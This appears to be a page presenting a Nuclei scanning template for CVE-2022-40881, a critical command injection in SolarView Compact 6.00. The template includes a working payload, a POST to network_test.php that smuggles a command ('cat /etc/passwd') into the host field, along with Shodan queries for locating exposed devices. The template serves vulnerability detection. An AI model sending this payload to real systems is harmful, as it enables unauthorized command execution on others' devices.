Skip to content

SolarView 6.00 - Remote Command Execution

ID: CVE-2022-40881

Severity: critical

Author: For3stCo1d

Tags: cve,cve2022,solarview,rce,lfi,contec

SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.

id: CVE-2022-40881
info:
name: SolarView 6.00 - Remote Command Execution
author: For3stCo1d
severity: critical
description: |
SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
remediation: |
Apply the latest patch or upgrade to a non-vulnerable version of SolarView.
reference:
- https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php
- https://github.com/advisories/GHSA-wx3r-88rg-whxq
- https://nvd.nist.gov/vuln/detail/CVE-2022-40881
- https://github.com/KayCHENvip/vulnerability-poc
- https://github.com/Threekiii/Awesome-POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-40881
cwe-id: CWE-77
epss-score: 0.95977
epss-percentile: 0.99469
cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: contec
product: solarview_compact
shodan-query:
- http.favicon.hash:"-244067125"
- cpe:"cpe:2.3:h:contec:solarview_compact"
tags: cve,cve2022,solarview,rce,lfi,contec
variables:
cmd: "cat${IFS}/etc/passwd"
http:
- raw:
- |
POST /network_test.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
host=%0a{{cmd}}%0a&command=ping
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a0046304402200abb5a03efeae8f603fadd32ef02d3168b282169845f30106b018365848680420220475364f4a32d6e39ba06a3f37ba25c97c951537910c3b0417a7b9d0726893cee:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-40881.yaml"

View on Github